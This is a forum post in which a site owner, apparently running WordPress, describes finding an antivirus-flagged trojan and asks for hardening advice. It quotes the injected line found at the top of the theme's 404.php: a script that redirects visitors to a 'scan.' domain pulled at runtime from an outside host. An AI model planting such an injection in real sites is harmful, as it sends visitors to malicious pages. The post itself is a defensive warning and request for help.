Hello people.
I am writing this in order to
1) warn other people.
2) help people who might got this hack
3) get more tips from more knowledgeable people then me :)
I entered into one of my sites today and my AVAST antivirus warned me against a Trojan Horse (JS:ScriptIP-inf [Trj])
That was located inside my theme image files, two of them:
1) images/ico-catlist.gif\{gzip}
2) images/ico-arrow.gif\{gzip}
I searched for them in the source code of the site but couldn't find them.
I then went to the server and didn't see any changes in those files.
I then looked for any changes made to any of the files on the site.
I found that the 404.php file was changed today.
After opening it I found it had the following code added to the beginning of it (just before the "<?php get_header(); ?>" ) :
<script>location='http://scan.<?php echo file_get_contents('http:// borntobebest . biz/actual_domain.txt'); ?>/vista1/6/48017/';</script>
(I added spaces in the URL, just to be on the safe side)
I erased the extra line and the site stopped to give Trojan warnings.
Here are my questions:
1) my theme diractory was CHMOD 775, I changed it to 555 - will this help in the future ?
2) Why did my homepage suffer from a code injection in the 404.php ? isn't the 404.php file activated only when the page is not found ?
Any thoughts will be warmly welcomed.
Tal
mousewrites
